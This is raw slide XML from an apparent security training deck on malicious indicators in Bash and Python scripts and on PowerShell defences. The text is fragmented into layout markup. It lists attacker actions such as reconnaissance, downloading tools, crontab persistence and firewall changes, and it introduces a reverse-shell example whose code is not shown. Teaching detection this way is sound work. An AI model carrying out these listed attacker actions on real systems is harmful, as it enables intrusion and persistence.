              <a:rPr dirty="0" sz="2200" spc="-5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aud</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ting</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="366395" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2605"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="366395" algn="l"/>
                <a:tab pos="367030" algn="l"/>
              </a:tabLst>
            </a:pP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Used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dirty="0" sz="2200" spc="-13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execution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control</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="366395" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="366395" algn="l"/>
                <a:tab pos="367030" algn="l"/>
              </a:tabLst>
            </a:pP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Used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constrained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language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mode</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="366395" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="366395" algn="l"/>
                <a:tab pos="367030" algn="l"/>
              </a:tabLst>
            </a:pP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Use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scrip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acin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logg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ng</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="366395" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="366395" algn="l"/>
                <a:tab pos="367030" algn="l"/>
              </a:tabLst>
            </a:pP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Used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prevent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usage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older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versions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PowerShell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9423" y="306451"/>
            <a:ext cx="667639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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Bash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5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dirty="0" spc="-6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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Malicious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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Indicators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6076" y="760476"/>
            <a:ext cx="8999220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980435" y="1933193"/>
            <a:ext cx="1069657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Python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scripts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batch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files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bash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commands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used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automation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tasks.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54095" y="2817264"/>
            <a:ext cx="10399775" cy="574304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914013" y="3863746"/>
            <a:ext cx="1788160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100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="7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urne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Again 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Shell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(Bash)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98332" y="3957066"/>
            <a:ext cx="1310005" cy="6972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Malicious</a:t>
            </a:r>
            <a:endParaRPr sz="2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indicators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578590" y="4108196"/>
            <a:ext cx="141922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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Web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ells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79616" y="6702043"/>
            <a:ext cx="1616710" cy="69723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0"/>
              </a:spcBef>
            </a:pP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F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le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grity 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scans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861295" y="6586855"/>
            <a:ext cx="1470025" cy="69723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0"/>
              </a:spcBef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Resource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monito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7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9423" y="306451"/>
            <a:ext cx="667639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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Bash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5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dirty="0" spc="-6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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Malicious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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Indicators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6076" y="760476"/>
            <a:ext cx="8999220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711955" y="1933193"/>
            <a:ext cx="923417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malicious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script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running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Linux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host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might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attempt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following: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627117" y="3086354"/>
            <a:ext cx="6444615" cy="756920"/>
            <a:chOff x="4627117" y="3086354"/>
            <a:chExt cx="6444615" cy="756920"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4639817" y="3099054"/>
              <a:ext cx="6419215" cy="731520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6419215" h="731520">
                  <a:moveTo>
                    <a:pt x="6297168" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="121920" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74473" y="9584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35718" y="35718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9584" y="74473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="121920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9584" y="657046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35718" y="695801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74473" y="721935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121920" y="731520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6297168" y="731520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344614" y="721935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6383369" y="695801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6409503" y="657046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6419088" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6419088" y="121920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6409503" y="74473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6383369" y="35718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344614" y="9584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6297168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639817" y="3099054"/>
              <a:ext cx="6419215" cy="731520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6419215" h="731520">
                  <a:moveTo>
                    <a:pt x="0" y="121920"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9584" y="74473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35718" y="35718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74473" y="9584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121920" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6297168" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344614" y="9584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6383369" y="35718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6409503" y="74473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6419088" y="121920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6419088" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6409503" y="657046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6383369" y="695801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344614" y="721935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6297168" y="731520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121920" y="731520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74473" y="721935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35718" y="695801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9584" y="657046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="121920"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400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27090" y="3268726"/>
            <a:ext cx="484251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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Perform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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>reconnaissance-type</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>activity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627117" y="4358894"/>
            <a:ext cx="6444615" cy="755650"/>
            <a:chOff x="4627117" y="4358894"/>
            <a:chExt cx="6444615" cy="755650"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4639817" y="4371594"/>
              <a:ext cx="6419215" cy="730250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6419215" h="730250">
                  <a:moveTo>
                    <a:pt x="6297422" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="121666" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74312" y="9562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35639" y="35639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9562" y="74312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="121665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="608329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9562" y="655683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35639" y="694356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74312" y="720433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121666" y="729995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6297422" y="729995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344775" y="720433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6383448" y="694356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6409525" y="655683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6419088" y="608329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6419088" y="121665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6409525" y="74312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6383448" y="35639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344775" y="9562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6297422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639817" y="4371594"/>
              <a:ext cx="6419215" cy="730250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6419215" h="730250">
                  <a:moveTo>
                    <a:pt x="0" y="121665"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9562" y="74312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35639" y="35639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74312" y="9562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121666" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6297422" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344775" y="9562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6383448" y="35639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6409525" y="74312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6419088" y="121665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6419088" y="608329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6409525" y="655683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6383448" y="694356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344775" y="720433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6297422" y="729995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121666" y="729995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74312" y="720433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35639" y="694356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9562" y="655683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="608329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="121665"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400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6815708" y="4540758"/>
            <a:ext cx="2066289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Dow</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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load</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ols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627117" y="5669534"/>
            <a:ext cx="6444615" cy="756920"/>
            <a:chOff x="4627117" y="5669534"/>
            <a:chExt cx="6444615" cy="756920"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4639817" y="5682234"/>
              <a:ext cx="6419215" cy="731520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6419215" h="731520">
                  <a:moveTo>
                    <a:pt x="6297168" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="121920" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74473" y="9584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35718" y="35718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9584" y="74473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="121919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="609599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9584" y="657046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35718" y="695801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74473" y="721935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121920" y="731519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6297168" y="731519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344614" y="721935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6383369" y="695801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6409503" y="657046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6419088" y="609599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6419088" y="121919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6409503" y="74473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6383369" y="35718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344614" y="9584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6297168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639817" y="5682234"/>
              <a:ext cx="6419215" cy="731520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6419215" h="731520">
                  <a:moveTo>
                    <a:pt x="0" y="121919"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9584" y="74473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35718" y="35718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74473" y="9584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121920" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6297168" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344614" y="9584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6383369" y="35718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6409503" y="74473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6419088" y="121919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6419088" y="609599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6409503" y="657046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6383369" y="695801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344614" y="721935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6297168" y="731519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121920" y="731519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74473" y="721935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35718" y="695801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9584" y="657046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="609599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="121919"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400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5953125" y="5851905"/>
            <a:ext cx="3792854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70">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Add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Cronta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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(task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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>schedu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70">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>)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627117" y="6958838"/>
            <a:ext cx="6444615" cy="755650"/>
            <a:chOff x="4627117" y="6958838"/>
            <a:chExt cx="6444615" cy="755650"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4639817" y="6971538"/>
              <a:ext cx="6419215" cy="730250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6419215" h="730250">
                  <a:moveTo>
                    <a:pt x="6297422" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="121666" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74312" y="9562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35639" y="35639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9562" y="74312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="121665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="608329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9562" y="655683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35639" y="694356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74312" y="720433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121666" y="729995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6297422" y="729995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344775" y="720433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6383448" y="694356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6409525" y="655683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6419088" y="608329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6419088" y="121665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6409525" y="74312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6383448" y="35639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344775" y="9562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6297422" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="EE63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639817" y="6971538"/>
              <a:ext cx="6419215" cy="730250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6419215" h="730250">
                  <a:moveTo>
                    <a:pt x="0" y="121665"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9562" y="74312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35639" y="35639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74312" y="9562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121666" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6297422" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344775" y="9562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6383448" y="35639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6409525" y="74312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6419088" y="121665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6419088" y="608329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6409525" y="655683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6383448" y="694356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6344775" y="720433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6297422" y="729995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121666" y="729995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74312" y="720433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35639" y="694356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9562" y="655683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="608329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="121665"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400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5193919" y="7140956"/>
            <a:ext cx="530796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60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Change</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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account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FFFFFF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firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>configuration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9423" y="306451"/>
            <a:ext cx="667639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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Bash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5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dirty="0" spc="-6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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Malicious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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Indicators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6076" y="760476"/>
            <a:ext cx="8999220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665345" y="1933193"/>
            <a:ext cx="711771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Typical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code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implement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reverse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shell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as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follows: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181600" y="3561588"/>
            <a:ext cx="5915025" cy="2802890"/>
            <a:chOff x="5181600" y="3561588"/>
            <a:chExt cx="5915025" cy="280289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36464" y="3561588"/>
              <a:ext cx="5859780" cy="280263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81600" y="3808476"/>
              <a:ext cx="5905500" cy="248259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288279" y="3611880"/>
              <a:ext cx="5735320" cy="2679700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5735320" h="2679700">
                  <a:moveTo>
                    <a:pt x="5734812" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2679192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5734812" y="2679192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5734812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288279" y="3611880"/>
              <a:ext cx="5735320" cy="2679700"/>
